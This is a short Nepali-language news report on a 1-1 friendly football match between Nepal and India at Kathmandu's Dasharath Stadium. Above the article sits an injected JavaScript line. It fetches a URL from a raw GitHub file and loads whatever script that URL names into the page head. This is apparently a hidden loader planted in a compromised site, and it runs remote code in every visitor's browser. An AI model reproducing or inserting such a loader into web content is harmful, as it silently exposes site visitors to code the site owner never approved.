;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यूज, काठमाण्डौ |काठमाडौँस्थित दशरथ रङ्गशालामा भएको नेपाल-भारत मैत्रीपूर्ण फुटबल प्रतियोगितामा नेपाल भारतसँग १-१ को बराबरीमा रोकिएको छ । खेलमा नेपालले सुरुवाती अग्रता लिएपनि भारतले गोल फर्काउँदै खेल बराबरीमा रोकेको हो ।
नेपाली फरवार्ड अञ्जन विष्टले खेलको ३६ औँ मिनेटमा गोल गर्दै नेपाललाई अग्रता दिलाएका थिए । भारतीय टीमका गोल कीपर गोल पोस्टभन्दा केही अगाडि आएको मौका छोपी उनले गोल गरेका थिए ।
त्यस्तै ५९ औँ मिनेटमा भारतका अनिरुद्ध थापाले बराबरी गोल फर्काएपछि खेल बराबरी भएको हो । सुनिल क्षेत्रीले प्रहार गरेको कडा सट बचाउने क्रममा किपर किरण चेम्जोङ लडेको मौकाको फाइदा उठाउँदै थापाले गोल फर्काएका हुन् ।
भारतसँग अबको खेल आइतबार दशरथ रङ्गशालामा हुनेछ ।
फेसबुक प्रतिक्रियाहरु